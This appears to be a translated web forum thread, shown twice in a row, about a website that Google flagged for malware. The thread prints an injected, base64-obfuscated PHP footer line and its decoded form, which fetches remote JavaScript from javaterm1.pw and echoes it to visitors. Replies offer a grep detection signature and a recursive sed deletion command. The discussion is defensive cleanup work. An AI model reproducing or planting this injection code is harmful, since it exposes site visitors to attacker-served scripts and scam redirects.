google 标记的网站中的恶意软件
Malware in website flagged by google
这是被 google 检测为恶意软件的链接的屏幕截图:
我正在网站上工作ExclusivelyHybrid
它有链接到它的 adwords。突然google将该网站列入黑名单,并说他们的服务器被来自该网站的恶意软件攻击。
交叉检查网站扫描仪,未发现恶意软件。
要求 google 对其进行扫描,他们也没有在网站上发现任何恶意软件。
然后要求 hostgator 对其进行深度扫描,他们也没有发现任何恶意软件。
Google 同意再次启动 adword 活动,但他们再次受到恶意软件攻击并将网站列入黑名单。
hostgator 的编码人员检查了该站点,发现了 3 个导致问题的链接。
我有链接,但点击它们电脑会被感染(我应该在这里分享链接吗?)
我已经搜索了整个源代码和网站的所有 javascript,没有找到这样的链接。
任何人都可以提供有关这些链接可以在何处以及在哪些文件中的建议吗?
这是我在网站页脚中找到的内容:
<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>
它解码为:
if(function_exists('curl_init'))
{
$url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
您肯定在该网站上有可疑行为。我刚刚被重定向到欺诈性 'scam' "You are our 100kth visitor on Firefox".
我没有按任何按钮或任何东西。
查找正在插入的 Javascript 代码,从头开始插入基本 HTML 页面并查看问题是否仍然存在。
不要使用网站扫描仪。它们无法正常工作。
您必须查看您的访问日志。
在查看日志之前,您可以使用 shell。
搜索此字符串:
rgrep 'eval(gzinflate(base64_decode' * -l
如果找到某些内容,可以使用以下字符串将其删除:
find ./ -type f -exec sed -i '/eval(gzinflate(base64_decode/d' {} \;
删除访问日志后,重新启动 apache,如果恶意软件又回来了,请查看访问日志。
在我的例子中,恶意软件就在那里:
[30/Jul/2015:11:57:13 +0200] "POST /wp-content/themes/skeleton/404.php
这是被 google 检测为恶意软件的链接的屏幕截图:
我正在网站上工作ExclusivelyHybrid
它有链接到它的 adwords。突然google将该网站列入黑名单,并说他们的服务器被来自该网站的恶意软件攻击。
交叉检查网站扫描仪,未发现恶意软件。
要求 google 对其进行扫描,他们也没有在网站上发现任何恶意软件。 然后要求 hostgator 对其进行深度扫描,他们也没有发现任何恶意软件。
Google 同意再次启动 adword 活动,但他们再次受到恶意软件攻击并将网站列入黑名单。
hostgator 的编码人员检查了该站点,发现了 3 个导致问题的链接。
我有链接,但点击它们电脑会被感染(我应该在这里分享链接吗?)
我已经搜索了整个源代码和网站的所有 javascript,没有找到这样的链接。
任何人都可以提供有关这些链接可以在何处以及在哪些文件中的建议吗?
这是我在网站页脚中找到的内容:
<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>
它解码为:
if(function_exists('curl_init'))
{
$url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
您肯定在该网站上有可疑行为。我刚刚被重定向到欺诈性 'scam' "You are our 100kth visitor on Firefox".
我没有按任何按钮或任何东西。
查找正在插入的 Javascript 代码,从头开始插入基本 HTML 页面并查看问题是否仍然存在。
不要使用网站扫描仪。它们无法正常工作。 您必须查看您的访问日志。
在查看日志之前,您可以使用 shell。 搜索此字符串:
rgrep 'eval(gzinflate(base64_decode' * -l
如果找到某些内容,可以使用以下字符串将其删除:
find ./ -type f -exec sed -i '/eval(gzinflate(base64_decode/d' {} \;
删除访问日志后,重新启动 apache,如果恶意软件又回来了,请查看访问日志。 在我的例子中,恶意软件就在那里:
[30/Jul/2015:11:57:13 +0200] "POST /wp-content/themes/skeleton/404.php